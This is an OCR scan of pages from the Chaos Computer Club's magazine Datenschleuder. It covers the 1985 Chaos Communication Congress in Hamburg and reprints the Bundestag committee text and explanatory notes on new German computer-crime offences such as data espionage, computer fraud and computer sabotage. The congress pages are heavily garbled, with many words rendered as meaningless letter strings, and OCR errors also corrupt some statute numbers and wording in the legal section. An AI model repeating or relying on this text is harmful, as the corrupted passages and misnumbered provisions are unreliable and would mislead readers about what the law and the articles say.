zugänglich gemacht werden. Ansprechpartner hierfür Ist der
BBSH, zu erreichen über die CLINCH-Box Hamburg,
interml 5 861306 2035 goblin
C9927F
Datemchleuder " Sonderausgabe
CHROS COMMUNICRTION CONGRESS 85^
EIDELSThDTER BÜRGERHAUS Hflf-BURG 27.12.-23.12.05
Das wissenscha^^tliche Fachblatt BTX 320«201>B5S322
Der Congress tanzt
FrUNer u*r dir Tanz Rudrick akivcr Komit
atkatio«: lin Or1 dar ItDataJctauiaalmi ULcr gt-
osraiitcfie Grcazt* Mawcg. Jcfal hat der CCC
tiMa Bodia lwrtiit4auidim tuli aur Jahrttwti-
dt SjtDpL DatearciMidt, Pfreakt uad aadert
Koianuiiikafioaibistülartc Ln Eidibtädfer Bik-
serhato tun Tanz auBordtra koaBta.
bat Hotto: Du darill
Dil Hcitagc; Bznufat dir Nzicn Hadica!
Ur Mollen den weder durch Preii-noch durch
Zcnturrchranken gehinderten Fluß der Informa¬
tionen. Ur woDen Datenbanken, gefüllt mit
releuanter Information. Wir wollen Knoten¬
punkte einrichten, vorhandene unlerttiiben und
untereinander vemetren. Ein Marktplatz der
foiien Information mit Anrchluß an die Weil
Herrschende Institutionen haben sich nicht auf
die neuen Medien gestürzt, um den freien Infor¬
mationsaustausch zu fordern, sondern um diese
Medien zu kommerzialisieren und ihren Interes¬
sen dienstbar zu machen. Wir haben andere
Interessen.
Uavor hat der Große Sus^ einige Slolpersteini
telegt, in Form der POST und der etablierten
Informationsuirtschaft, die eifersüchtig ihre
Pfründe bewachen.
die eifersüchtig
OHJtochl«¥l
r . 1 ^ 6710190 d 40 S 1
EWIN ERFWSVCoN^
KONTBOLLrURJ^ ryV
filT * ww
2£)l'fMUoi”l)TEI
ipon«xxriirASSTxxxx«C!Ml Mx«»»xx«im«x« » »«»x» x»»n
inOia0MQ51ZXXXXX5/ai769»2tO6?XXXXXXXXXIXXXXXXXXXXXIj
Oie gepbnte Novellierung der Gesetze über die
W HsebaftskrimtnaHtät und die ßngst des Etla-
hlühment vor mündigen - sprich informierlen -
Bürgern tragen auch nicht dazu bd, einen wlrk-
bch freien Informationtautiauicb lu trmüfH-
chen. Aber nicht genug, schlichtes Unwisstn.die
oft unnötig kompbzierta Bedienung der techni¬
schen Etnrehtungen und eine diffuse fliest vor
dem Jobkiller Compuier machen (luikliirungs-
arbeü nötig.
Hier bittet der Congress tum Tanr. Uir wallen
voneinander lernen, nicht nur den Umgang mit
der Technik, sondern auch mit xmt. U ir können
lernen, Schwellenkngste tu überwinden und dte
bestehenden Einrichtungen lur yerhreitung un¬
gehemmter Information tu nutzen, con-
Lnz.wt851228 2305
H jCHAXDIENSf
■ Teilnehmebere ch ligieiB , ^
CtieM ^
ConvTwi^atfOi^
Conortii 1985
Mi
H MC
• r
Sei te
Freie (?) Republik Eidelifcdf
W k wlio* la «crfkBjiMB Jkk Ul lu CoMrui*
«cliiic *Hük>k(k ZoM*. Dt>k ici Hcbl-
Ickklon ilkßdu »ich «liiu Vtriläadab mi
Ziiipolsiikvdk Ur« Dintlwaiii ia RuId lic-
UntB- rtu-ken Sicherheiliuorltthninf en...‘
rUnd in ^ Zritunf. Diei Jaiir wurde ein neuer,
koctiitempfindjicher Deteklor in tthwanes Pli-
tiiliroiv' «ertchkdener DureKnencr CGummik-
nuipclthnlicJi) cinfcliaut und mH roten Leuchl-
kleDulreikn vcniö-l Er xiehl aLiohil leFahrlicii
autund piepthircliterbch. t1 axünalemphndhch-
Veil: 1 Scltraukc. Er findet auch alle möjlichen
anderen Gerate, die lum OkbtUhl penönlkber
Daten dienen kännlea. Dat bißchen Elchironilk
und die Batterien dnd in ein Handiunkierat
lam Umhanfen enf ebaul. U iehUie Erfäniunf
Bl die Femtprechuerbindvnr tur umkhlbartn
EintaUleiUin«. Dat Game ht die Cbaoi-Mini-
fiuloritaücinneil und macht aut jedem, der tie
träft, eilt bötbsl lindniektuoQe K.ontrollper-
>on.
Dkie maachem ctwai merkwürdif anmutenden
Uorkthrunfcn faranlieren unt immerhin einen
cinifermaßen uohebelliften flufenlhall h der
freien R»ubLik Eideliledl, deren Grenien bii
Sonntif Abcad feilen und dk Seihttuerwahunf
k\ SEkerheHtiraeen erfordert, um prfenlonelle
*Sckützer‘ kerukifl uou ihrur Auifake frrcklel-
len tu kbnae«.
Dazu fckörlauck dat SicherhciUiftlem im K a-
tastropkeafaH Um fatalen Folien einet lokhen
F allet «onnkeuf cn, Wirde dkkommunikatiam-'
technische Infraztruktair nach bestem Behorden-
wisna mit dem Uaterttübunf auffcbaut und
CTfänzl dirch im rauhen HacknllUf bewahrte
Geräte
Dat teardnele UerhsKn der Räume im Gefah-
reaiall wird vom Chaot-Oknti imlerttübt und
durch Laulsprecberdurchtafen ferteueri. Der
Code kt äbalkh dem ki Großkaufhäutem fc-
wähJt und noch baJbfcheim. Die Durchiaie
'Kam nach Notkau* bewirkt durch dk ßkU-
vierunt unhcwvßter Denkinhalle dat Freima-
cJien des £mfan|ihcreichi samt Kaste für den
fcordnetea Autzuf.
rcpullik.wt 8S122o ISrff c
UMFRAGE;
f0/( der Beirafien wollten 'Konlakle anknüp*
fen, W. 'Neuei fiber DFÜ erWren', ein
DriilcJ 'neue Software bekommen'. Einer dm
Befr^ften äi£crte als Grund für seine flnrtke,
er wolk 'mal WAU penöihch kenaenlemsD .
Dnl Ufcrteldcr telhehmer kirnen NICHT lut
dem Großraum Hamluri, eondem waren eB.
aut Kirbiihe, Köln oder Bramen injereltt
wmira/m.y$SSi228 flf.'lle
Eurobox
kl ein ekktoniichet Cafe-Haut iwkchen Dublin
und Athen. Die Eurobox ttarlei am 1.1.86 und
wird uon Milfbedem der Eura-Gninen helrie¬
hen. In der Eurobox tolkn etnerielts wertchlede-
ne Inlormaikntdknik der EG und des Europa-
parhmenU veriutbar lemachl werden, anderer-
seitt »oU sic dk U ratebum hir citene Iniorras-
tionjJiensle bieten. Und scnliettbch urd tie tkh
hofientbch aui die Dauer au einem Nett von
Inlertnierlen autueilen, die direkt Info't zu
verschiedenen Themen austauschen.
Eurobox wird demnächil als lelrenntei Menü
innerhalb der COM BOX ertewinen. Themen
uon BrtUem könnten ttin:
- Aktuelles im EP
- Friuenrechle
- Dritte U cU - Landw irlschaft
- Umweltschutz
- Gen/Bio-Technolofie
- Chemie und Gift
-Emifranten, Asylanten, Jobber
- Neue Technolof kn
- Action in Europc
- US-Euro-Links
' U ho k w ho and where
Eurobox ist technisch feseheneineCloted-Uter-
Group. Auster den unvermeidfichen Gebühren
an
Pott und Com box darin keine finanziellen Inter¬
essen verwirklichl werden. inUrestenlen wenden
zkh an
Btiidil;l Hirlii
in der Box «tir
Im Mehrinfhof
Gneisenaustr. 2
1000 Berlin £1
Tel 030d532 22 22
eurobox.wt 8S1228 05:DOe
Heiße Dafen, kühle kCoppler
Dk K 01 ^ rett-fi OK, deren Nummer in allen Ham-
burter Boxen bcft, erhieh am Samstai von 7
bk if Uhr ca. 20 Anrufe. Leideritt kein Prola-
koD uerhifbar, da die Box am frühen Samsla-
«ahend ibsiürzte und der fesamte Dkketienin-
niH verkrtn fbif. Die ^sOp'i uertuebien, in
Nachtschicht, die Box wirair hochiufahren.
Auferund der Ubertrafunfsprobleme, hedinft
durch iauies Hinterfrundfclächter, wurde von
den anwesenden Experten während desK oneret-
*cs eine neue Tcchnolofic cniHickclt der Kop-
pkr liehl nun itoikrlim KUfdschrtik.
iox.8Sim OfsOde
Seite 6
2)atcn§rf)Icubcr Seite 7
15 = Mar?, 1986
Wissenschaftliches Fachhiatc für Datenreisende
Herausgegeben vom Chaos Computer Club
Deutscher Bundestag — lO.Wahlperiode DrUCksache 10/5058
Beschlüsse des 6. Ausschusses (2) Der Versuch ist strafbar.
2c. § 202 Abs. 3 erhSIt folgende Fassung: (3) § 267 Abs. 3 ist anzuwendon.
§270
Täuschung im Rechtsverkehr bei
Dntonverarbeitung
Der Täu.schung im Rechtsverkehr .steht die
fälschliche Beeinflussung einer Datenverarbei¬
tung im Rechtsverkehr gleich,"
»<(3) Einem Schriftstück Im Sinne der Absät¬
ze 1 und 2 steht eine Abbildung gleich.'*
2d. Nach 5 202 wird folgende Vorschrift eingefügt;
„8 202 a
Aussp&hen von Daten
(1) Wer unbefugt Daten, die nicht lür Ihn be¬
stimmt und die gegen unberechtigten Zugang
besonders ge.sicherl sind, sich oder einem ande¬
ren verschafft, wird mit Freiheitsstrafe bis zu
drei Jahren oder mit Geldstrafe bestraft.
(2) Daten Sm Sinne des Absatzes 1 sind nur
solche, die elektronisch, magnetisch oder sonst
nicht unmittelhar wahrnehmbar gespeichert
sind oder übermiilelt werden."
2c. ln 8 205 Ab.s, 2 Satz J wird der Punkt durch
einen Strichpunkt ersetzt und folgender Halb¬
satz angefügt:
„dies gilt nicht in den FBIlen des § 202 a."
3. Nach § 263 wird folgende Vorschrift eingefügt:
263 a
Computorbetrug
(1) Wer in der Absicht, sich oder einem Drit¬
ten einen rechtswidrigen Vermögonsvorteil zu
verschaffen, das Vermögen eines anderen da¬
durch beschädigt, daß er das Ergebnis eines Da-
tenverarbeitung.svorgangs durch unrichtige Ge¬
staltung des Programms, durch Verwendung
unrichtiger oder unvollständiger Daten, durch
unbefugte Verwendung von Daten oder sonst
durch unbefugte Einwirkung auf den .Ablauf be¬
einflußt. wird mit Freiheitsstrafe bis zu fünf
Jahren oder mit Geldstrafe bestraft.
(2) § 263 Abs. 2 bis 5 gilt entsprechend."
§ 266 b
IVlinbrauch von Scheck- und Kreditkarten
(1) Wer die ihm durch die Überlassung einer
Scheckkarte oder einer Kreditkarte einge-
räumte Möglichkeit, den Aussteller zu einer
Zahlung zu veranlassen, miflbraucht und die¬
sen dadurch schädigt, uird mit Freiheitsstrafe
bis zu drei Jahren oder mit Geldstrafe bestraft.
(2) § 248 a gilt entsprechend."
..§ 269
Fälschung beweiserheblicher Daten
(I) Wer zur Täuschung im Rechtsverkehr be*
waiserhebliche Daten so speichert oder verän¬
dert. daß bei ihrer Wahrnehmung eine unechte
oder verfälschte Urkunde vorliegen würde, oder
derart gespeicherte oder veränderte Daten ge¬
braucht, wird mit Freiheitssfrafe bis zu fünf
Jahren oder mit Geldstrafe bestraft.
7. In §271 Abs. 1 werden nach dem Wort ..Bü¬
chern" ein Beistrich uiid da.s Wort „Dateien" .so¬
wie mich dem Wort „beurkundet" die V'orte
..oder gcspeichcrl"' eingefiigt.
fl. In § 273 werden nach dem Wort „Heurkundurg"
die Worte „oder Datcnspeiclierung" eingefügt.
§ 274 Ab.s, 1 Wird wie folgt genndort:
noch Nummer 1 wird folgende Nummer 2
eingefügt:
..2. beweiserhebliche Daten (8 202a Abs.2),
über die er nicht oder nicht ausschließlich
verfügen darf, in der Absicht, einem an-*
deren Nachteil z'urufügen, löscht, unter¬
drückt, unbrauchbar macht oder verän¬
dert oder";
„8 3038
Datenveränüerung
(1) Wer rechtswidrig Daten (8202a Abs.2)
löscht, unterdrückt, unbrauchbar macht oder
verändert, wird mit Freiheitsstrafe his zu rwei
Jahren oder mit Geldstrafe bestraft.
(2) Der Versuch ist strafbar.
§ 303 b
Computersabotage
(1) Wer eine Datenverarbeitung, die für einen
fremden Betrieb, ein fremdes Unternehmen
oder eine Behörde von wesentlicher Bedeutung
ist, dadurch stört, daß er
1. eine Tat nach § 303 a Abs. 1 begeht oder
2. eine Datenverarbeitungsanlage oder einen
Datenträger zerstört, beschädigt, unbrauch¬
bar macht, beseitigt oder verändert,
wird mit Freiheitsstrafe bis zu fünf Jahren oder
mit Geldstrafe bestraft.
(2) Der Versuch ist strafbar.
§303c
Strafantrag
In den Fällen der §§ 303 bis 303 b wird die Tat
nur auf Anfrag verfolgt, cs sei denn, da/) die
Slrafverfo/gungsbehörde wegen des besonderen
öffentlichen Interesses an der Strafverfolgung
ein Einschreiten von Amts wegen für geboten
bUli."
^atcn§if)lcuiict
15 = März 1986
Wissenschaftliches Fachblatt für Datenreisende
Herausgegeben vom Chaos Computer Club
Zu Artikel 1 Nr. 2c und 2d — §202 Abs. 3; §202a
StGB —
1. Der Ausschuß schlägt die Aufnahme eines in den
Entwürfen nicht enthaltenen Tatbestandes ge¬
gen das .^usspähen von Daten*' vor, der das un¬
befugte Verschaffen von besonders gesicherten,
nicht für den Täter bestimmten, nicht unmittel¬
bar wahrnehmbaren Daten unter Strafe stellt
Als Daten dargestellte Informationen sollen da¬
mit ln umfassender Welse strafrechtlich gegen
Spionage geschützt werden, als dies nach gelten¬
dem Recht möglich ist Der gestiegenen Bedeu¬
tung des Wertes von Informationen wird damit
strafrechtlich Rechnung getragen. Die in den
Entwürfen vorgeschlagenen Tatbestände zur
Computerkriminalität werden dadurch in einem
wichtigen Bereich ergänzt
a) Ausgangspunkt waren in der öffentlichen An¬
hörung erhobene Forderungen, strafrechtlich
das „unbefugte Abhören und Anzapfen von
Datenübertragungssystemen“ bzw. den „unbe¬
fugten Zugriff auf fremde Datenbanksysteme“
(Sieber, Prot Nr. 26 S. 177; Anl. S. 267 f.) unter
Strafe zu stellen bzw. Überlegungen, einen
verstärkten strafrechtlichen Schutz gegen
Computerspionage und das unbefugte Ein¬
dringen in Datenverarbeitungssysteme (ein¬
schließlich des unbefugten Herstellens und
Gebrauchens von Systemen, die der Überwin¬
dung von Sicherungsanlagen dienen) (Oertel
(Nixdorf. Computer AG). Prot S. 182f„ Anl,
S. 36£f.], 2 u schaffen. Nach Sieber stellt das
.Abhören“ von Datenübertxagungsleitungen
einen der wichtigsten Ansatzpunkte der Com¬
puterspionage im Bereich datenfemverarbei-
tender Systeme dar. Es biete weit größere
Möglichkeiten als das Abhören von Telefon¬
gesprächen. da digital übertragene Informa¬
tionen mit Hilfe von Computern sehr viel
leichter maschinell analysiert werden könn¬
ten als dies beim gesprochenen Wort mit Hilfe
von Spracherkennungsgeräten der Fall sei.
b) Das geltende Recht gewährt Daten nur in
Teilbereichen einen strafrechtlichen Schutz
gegen Spionage. §41 Bundesdatenschutzge¬
setz bezieht sich nur auf personenbezogene
Daten natürlicher Personen, §201 StGB auf
die Aufnahme bzw. das Abhören des nichtöf-
fenÜIch gesprochenen Wortes, wobei streitig
ist, ob auch der Zugriff auf bereits gefertigte
Aufnahmen erfaßt wird. § 202 Abs. 3 StGB
zieht In den Schutzbereich des Tatbestandes
der Verletzung des Briefgebeimnisses auch ei¬
nen „anderen zur Gedankenübermittlung be¬
stimmten Träger" mit ein. Damit werden un¬
streitig Fälle erfaßt, in denen z.B, in einem
Tresor aufbewahrte Computerdaten auf ei¬
nem Magnetband nach Öffnung zur Kenntnis
genommen werden. Da §202 Abs. 3 StGB auf
den Schutz (ijuerter menschlicher Gedanken
beschränkt, ist diese Regelung nicht anwend¬
bar, wenn Daten im ubermittlungsstadium
abgefangen werden.
s?
I
6
'S
3.
s.
o
a
o
7 !
8
S
c) Die Lückenhaftigkeit des geltenden Rechts
veranlaßt den Ausschuß, einen neuen Tatbe¬
stand vorzuschlagen, statt sich mit einer blo¬
ßen Ergänzung vorhandener Regelungen wie
etwa die des §202 Abs. 3 StGB zu begnügen.
Die Struktur des § 202 StGB bleibt dadurch
unangetastet. Der Ausschuß legt allerdings
Wert darauf, gespeicherte und im Übermitt¬
lungsstadium befindliche Daten gleich zu be¬
handeln. Die bisher durch §202 Abs. 3 i.V.m.
Abs. 1, 2 StGB geschützten Daten fallen daher
künftig unter den Schutzfaereich des neuen
§202a StGB.
Wegen des engen Zusammenhangs mit den
§§ 201,202 StGB schlägt der Ausschuß vor. den
Tatbestand in Anschluß an diese Regelungen
in den Fünfzehnten Abschnitt des Strafgesetz¬
buches einzustellen, obwohl die Straftat nicht
eine Verletzung des persönlichen Lebens¬
oder Geheimbereichs voraussetzt
d) Der Ausschuß hat davon abgesehen, wie zu¬
nächst von der Bundesregierung angeregt
schon den bloß unbefugten Zugang zu beson¬
ders gesicherten Daten und den Versuch einer
Straftat nach § 202 a Abs. 1 StGB unter Strafe
zu stellen. Der Gefahr einer Überkriminalisie¬
rung von Verhaltensweisen soll damit vorge¬
beugt werden. Das Strafrecht sollte erst dort
eingreifen, wo ein Schaden oder wenigstens
eine Rechtsgutsbeeinträchtigung, wie z.B. die
Verletzung des Verfügungsrechts über Infor¬
mationen bei einer Tat nach § 202 a StGB, ein¬
getreten ist Insbesondere sollen sog. „Hak-
ker", die sich mit dem bloßen Eindringen
m^i'n Computersvstem begnügen, also sic h
keine Daten unbefugt verschaffen, von Strafe
verschont bleiben. Was die Versuchsstrafbar¬
keit betrifft, ist darauf zu verweisen, daß die¬
ser bisher in § 202 StGB und § 41 BDSG auch
nicht mit Strafe bedroht ist Soweit es sich bei
dem unbefugten Eindringen um ein Vorsta¬
dium zur Begehung von bestimmten Compu¬
terstraftaten, sei es nach §202a Abs. 1. nach
§233, nach §269 oder nach §303a StGB han¬
delt bestehen aus allgemein strafrechtlichen
Erwägungen Bedenken, Vorbereitungshand-
lungen zu solchen Straftaten, die als Vergehen
eingeshift werden, schon als solche mit Strafe
zu bedrohen. Für eine Kriminalisierung ist
zwar darauf hingewiesen worden, daß mit
dem erfolgreichen Eindringen in fremde Da¬
tenbanken Integritätsinteressen von Betrei¬
bern und Benutzern gefährdet werden kön¬
nen und eine zu starke Systembelastung ein-
treten kann. Insoweit stellt aber ein solches
Verhalten erst eine Gefährdung dar. die für
den Ausschuß als Ansatzpunkt für einen
neuen Straftatbestand in diesem Bereich
nicht ausreicht. Ist die eingetretene Störung
durch das Eindringen so stark, daß Daten ver¬
ändert werden oder die Anlage beschädigt
wird, so können u.U. die §§ 303 bis 303b StGB
eingreifen. In Fällen, in denen der Täter sich
nicht mit dem unbefugten Zugang begnügt,
sondern darüber hinaus Daten abruft, bleibt
§202a StGB anwendbar.
Seite S
2. Im einzelnen ist folgendes zu bemerken:
Absatz I
Strafbar macht sich, wer nicht für ihn bestimmte
und gegen unberechtigten Zugang besonders ge¬
sicherte Daten i.S. des Absatzes 2 sich oder ei¬
nem anderen verschafft Geschützt werden damit
nicht alle Daten vor Ausspähung, sondern nur
diejenigen, die „besonders gesichert sind", d.h.
solche, bei denen der Verfügungsberechtigte
durch seine Sicherung sein Interesse an der „Ge¬
heimhaltung" dokumentiert Die geschützten Da¬
ten brauchen deswegen allerdings keine „Ge¬
heimnisse" I.S. der verschiedenen Straftatbe¬
stände zum Schutze von Geheimnissen darzu¬
stellen. Zur Auslegung des Begriffs „besonders
gesichert“ kann auf die Regelung in § 202 Abs. 2
StGB (vgl. auch §243 Abs, 1 Nr. 2 StGB) zurück¬
gegriffen werden. Zur Vermeidung etwaiger
Strafbarkeitslücken setzt der Tatbestand, inso¬
fern weitergehend als § 202 StGB, nicht voraus,
daß der Täter vom Inhalt der Daten Kenntnis
nimmt (vgl. §96 StGB und die Neufassung von
§ 1? Abs. 2 Nr. 1 UWG des Entwurfs: der Tatbe¬
stand läßt auch genügen, wenn der Täter einem
anderen die Daten ver.schafft. Waren die be¬
schafften Daten für den Tater (zu seiner Kennt¬
nisnahme) bestimmt, so entfällt — wie bei § 202
StGB — bereits die Tatbestandsmäßigkeit. Eine
solche Bestimmung ist allerdings noch nicht
darin zu sehen, daß der Abruf von z. B. entgeltlich
zu erhaltenden Daten nach ordnungsgemäßem
Anschluß an eine Datenbank allgemein möglich
ist; der Anwendung des §202a StGB entgeht der
Täter nicht, wenn er z.B. die Daten ohne einen
solchen Anschluß unbefugt abruft Waren die ei¬
nem anderen verschafften Daten für diesen be¬
stimmt so kann die Strafbarkeit wegen mutma߬
licher Einwilligung entfallen.
Die Tal ist nach § 205 Abs. l Antragsdelikt Diese
Ausgestaltung stellt, neben der Anwendung der
§§ 153. 153 B StPO. 47 JGG, einen wichtigen Filter
zur Verhinderung von unnötigen Strafverfahren
dar, z. B. wenn die Schuld gering ist und eine
materielle Rechtsgutbeeinträchtigung nicht vor¬
liegt
Absfltr 2
Der Anwendungsbereich des Tatbestandes wird
auf die in Absatz 2 genannten Daten beschränkt
Das Ausspionieren von Daten ist vor allem dort
gefährlich, wo Daten in großer Menge nicht sicht¬
bar, nicht lesbar oder sonst nicht unmittelbar
wahrnehmbar gespeichert werden. Unmittelbar
wahrnehmbare Daten sind u.a. durch die §§201.
202 StGB ausreichend geschützt Zur Klarstel¬
lung wird die Einbeziehung von Daten, die über¬
mittelt werden, besonders hervorgehoben. Be¬
wußt hat der Ausschuß davon abgesehen, nur sol¬
che Daten zu schützen, die in eine Datenverar¬
beitungsanlage gespeichert in eine solche oder
aus einer solchen übermittelt werden. Vom ge¬
schützten Rechtsgut her kann es keine Rolle
spielen, welche Technologie bei der Speicherung
und Übermittlung von Daten verwendet wird.
Eine Notwendigkeit, den Datenbegriff näher zu
bestimmen, hat der Ausschuß ebensowenig wie
seinerzeit bei Einführung des § 266 (Absatz 2)
StGB (vgl. den Ausschußbericht Drucksache
IV/4094, S. 37 und die Auslegung in der Literatur)
und des §2 Abs. 1 BDSG gesehen. Hervorzuhe¬
ben ist daß selbstverständlich auch gespeicherte
Programme erfaßt werden.
2)atcn§d)Icttbct
15 = Marz 1986
Wissenschaftliches Fachblatt für Datenreisende
Herausgegeben vom Chaos Computer Club
§ 202 Abs. 3
Die Neufassung ist eine Folgeänderung zu dem
Tatbestand des § 202 a StGB, der die bisher von
§202 Abs. 3 i.V.m. Abs. 1, 2 geschützten Gedan-
kenerklämngen in seinen Schutz auch einbe¬
zieht
Zu Artikel 1 Nr. 2e — § 205 StGB —
Der Ausschluß des Übergangs des Strafantrags ent¬
spricht der vergleichbaren Regelung ru §41 Abs. 1
Nr. 2 BDSG (vgl. § 77 StGB).
S
S
¥>
P
5
a
■g
•c
Zu Artikel 1 Nr. 3 — § 263 a StGB —
Der Ausschuß hält den Vorschlag der Entwürfe, ei¬
nen gesonderten Tatbestand des „Computerbetru-
ges" einzuführen für sachgerecht und hat ihn mit
einigen nicht unwesentlichen Änderungen über¬
nommen. Auch wenn es in der Strafverfolgungspra¬
xis bisher nicht zu spektakulären Einstellungen
oder Freisprüchen gekommen ist so ist der Aus¬
schuß aus den im Regierungsentwurf genannten
Gründen von der Notwendigkeit, eine bestehende
Strafrechtslücke zu schließen, überzeugt In diesem
Punkte stimmen auch sämtliche Sachverständige
bei der öffentlichen Anhörung überein (vgl. Prot
Nr. 26 S. 164, 175f., 179. IBlf., 185f., IBS; Anl. S.35.
41f., 150, 201, 218, 25Sf.). In Fortsetzung der grund¬
sätzlichen Linie der Strafrechtsreform, spezifische
Mängel und Lücken klassischer Straftatbestände
(§§263, 266, 267 StGB) nicht durch Änderung und
Ergänzung dieser Tatbestände, sondern durch er¬
gänzende neue Tatbestände zu beheben, hat sich
der Aus.schuß dafür entschieden, an der Einführung
eines Sondertatbestandes festzuhalten. Er sieht
sich damit in Übereinstimmung mit der Empfeh¬
lung der Sachverständigenkommission zur Be¬
kämpfung der Wirtschaflskriminalität und mit au.s-
ländischen Regelungen (z. B. in Dänemark) und Re¬
formentwürfen (z.B. in Österreich und in der
Schweiz). Dem Vorschlag von Haft und Sieber in
der öffentlichen Anhörung (Prot S. 104, 169, 175
Anl. S. 201, 205 f, 256 ff.), sich mit einer bloßen Er¬
gänzung des §263 StGB zu begnügen, ist der Aus¬
schuß nicht gefolgt Haft (Prot S. 164 ff„ Anl.
S. 201 ff.) sieht ein Bedürfnis zur Ergänzung des
§ 283 StGB nur hinsichtlich des „lrrtums*'-Merk-
mals, weswegen er die Fassung der Entwürfe, die
die Parallele zur Tathandlung, zum Irrtumsmerk-
mal und zum ungeschriebenen Tatbestandselemenl
der Vermögensverfügung beim Betrugstatbestand
verlassen würden, ablehnt Er hat daher vorgeschla¬
gen, § 263 StGB nur um einen Satz zu ergänzen, der
dem Irrtum I.S. des §263 die Fehlinformation des
Computers gleichstellt Sieber (Prot S. 175 ff„
256 ff.) hat vorgeschlagen, den in § 263 StGB ge¬
nannten Tathandlungen die unrichtige oder fälsch¬
liche Beeinflussxmg eines automatischen Datenver¬
arbeitungsvorganges bzw. einer Datenverarbei¬
tungsanlage oder noch allgemeiner eines techni¬
schen Geräts, wenn das Datenverarbeitungssystem
auch Kontrollrwecken dient bzw. bei dessen Ein¬
satz Kontrollen erfolgen, gleichzustellen.
Seite 9
Illustration by Paul Slater
Der Ausschuß spricht sich dafür aus, die allgemeine
Struktur des § 263 StGB im Rahmen dieses Geset¬
zes unangetastet zu lassen. Der Betrugstatbestand
ist eine allgemeine Vorschrift zum Schutze des Ver¬
mögens gegen einen bestimmten Angriff, nämlich
die dort genannten Täuschungshandlungen in Be¬
reicherungsabsicht Gegen andere Angriffe auf das
Vermögen gibt es jeweils spezielle Vorschriften
(vgl. als allgemeine Regelung z.B. §286 StGB). Der
Computerbetrug stellt eine neue Manipulations¬
form zum Nachteil des Vermögens dar, die sich ge¬
rade dadurch auszeichnet daß ein Mensch nicht
getäuscht und zu einer vermögensschädigenden
Vermögensverfügung veranlaßt wird. Deswegen hat
der Ausschuß auch von der Alternative abgesehen,
den Computerbetrug in einem neuen Absatz 2 des
§ 203 StGB zu erfassen. Computerbetrügereien wei¬
sen Besonderheiten auf, die einen eigenen Tatbe¬
stand auch mit einer vom Betrug teilweise abwei¬
chenden Ausgestaltung rechtfertigen.
Gegen den Vorschlag von Haft hat der Ausschuß
u. a. auch deswegen Bedenken, weil auch andere
Merkmale des Betruges (^Vorspiegelung*'. „Erre¬
gen“ oder „Unterhalten“ eines Irrturps; ungeschrie¬
benes Merkmal der Vermögensverfügung) perso¬
nenbezogen zu verstehen sind und es daher nicht
ausreicht, nur bei dem Merkmal des Irrtums eine
Gleichstellung vorzunehmen. Der Vorschlag von
Sieber ist im Hinblick auf seine noch zu unscharfe
Fassung nicht bedenkenfrei. Seine Erwägung, einen
Strafrechtsschutz nur gegen Manipulationen an si-
cherheilskontrollierten Anlagen vorzusehen, würde
den Tatbestand zu sehr einschränken.
Durch Hervorhebung verschiedener Talmodalita-
ten, die sich an empirischen Erscheinungsformen
und an der Eigenart vermögonsschädigender Com¬
putermanipulationen orientieren, wird der Gefahr
einer zu weilen Ausdehnung des Tatbestandes vor¬
gebeugt.
Die ergänzte Fassung des Absatzes 1 hebt wie in
den Entwürfen die Tathandlungen der besonders
gefährlichen sog. fh-ogrammanipulation („unrich¬
tige Gestaltung des Programms“) und der Inputma-
nlpulation („Verwendung unrichtiger oder unvoll¬
ständiger Daten“), welche die Programmanipula-
tion an sich auch mitumfaßt (Programme sind eine
besondere Art von Daten), besonders hervor. Von
einer Verweisung auf den Datenbegriff des § 202 a
Abs.2 StGB wurde abgesehen, da §263a StGB ge¬
rade auch Fälle erfaßt, in denen nicht an bereits
gespeicherten Daten Manipulationen begangen,
sondern diese erst eingegeben werden.
Nachdem in der Wissenschaft und in der öffentli¬
chen Anhörung von mehreren Sachverständigen
(Haft Oertel. Lehnhoff [Zentraler Kreditausschuß),
Brentrup [Gesaratverband der Deutschen Versiche-
rungswirtschaftj, Prot Nr. 26, S. 167, 101, 184 £f„ 188,
Anl. S. 35,41 150.206.215 ff.) Zweifel geäußert wor¬
den waren, ob mit der Alternative der „unrichtigen
Verwendung von Daten'* auch der Fall erfaßt wer¬
den kann, daß jemand z. B. unbefugt fremde Code
nummern bei mißbräuchlichem Gebrauch eines
Geldautomaten oder jemand unbefugt einen frem¬
den Anschluß an das Bildschirmtextsystem benutzt
hat der Ausschuß eine ergänzende Klarstellung in¬
soweit für notwendig erachtet die auch vom Innen¬
ausschuß gebilligt wurde und einer Pmfungsanre-
gung des Finanzausschusses entspricht Der in der
S)otcn§rf|lcubcr
15 = März 1986
Wissenschaftliches Fachblatt für Datenreisende
Herausgegeben vom Chaos Computer Club
Wissenschaft umstrittene Ausweg, die §§ 242, 246
StGB anzuwenden, den teilweise Instanzgerichte
bei Mißbräuchen mit Bankomatkarten an Bargeld¬
automaten beschritten haben, steht bei einer mi߬
bräuchlichen Benutzung des Btx-Systems, die zu
vermögensschädigenden Verfügungen führt nicht
zu Verfügung.
Von Sieber (Prot Nr. 26 Anl. S. 257) wurden Beden¬
ken geäußert die Fassung der Entwürfe könne
eventuell dazu führen, daß neue Manipulationstech¬
niken (z.B. bestimmte Hardware-Manipulationen)
nicht erfaßt würden. Der Ausschuß hat diese Be¬
denken aufgegriffen und den Tatbestand in Anleh¬
nung an den österreichischen Entwurf um die Al¬
ternative der „unbefugten Einwirkung auf den Ab¬
lauf* des zuvor genannten Datenverarbeitungsvor¬
gangs ergänzt Die in den Regierungsentwürfen er¬
faßte „Einwirkung“ auf den „Programmablauf"
wurde dadurch, weil verallgemeinert, überflüssig.
Wa.s die vom Täter mittels einer oder mehrerer Tal-
modalitaten herbeigeführten und gewollten Folgen
betrifft so hat sich im übrigen aufgrund der paralle¬
len Ausgestaltung zu § 263 StGB die Auslegung des
§263a StGB zu des.-^en Eingrenzung an der Ausle¬
gung des § 263 StGB zu orientieren, wie dies näher
im Regierungsentwurf ausgeführt ist Dadurch
kann eine unnötige zu weile Anwendung des Tatbe¬
standes verhindert werden.
Im Hinblick auf entsprechende Erörterungen im Fi¬
nanzausschuß wird noch darauf hingewiesen, daß
soweit § 370 AO dem Betrugstatbesland vorgeht
dies auch im Verhältnis zu § 263a StGB gilt
I Absatz 2 wurde unverändert übernommen.
Juristische Fochselten zur Datenschleuder 15
Auf diesmal vier Seiten umfossende und aktuelle Information zu
den neuen Computerkriminalitätsgesetzen. Auszüge aus Erlöu-
ferungen und den Debatten sind mit freundlicher Genehmigung
des Verlages Dr. Heger, PF 200821 , 53 Bonn 2, abgedruckf.
Weitere rund 1000 Seiten zum Thema sind im Redoktionsarchiv
zu finden. _
jurhokl 5.WS 860323 2025 Seite 10
TATEN MIT DATEN
Beiunt wird über Netzwerke leredeLte flmeriki
werden rie benutzt Um über ihre Erfabrunien
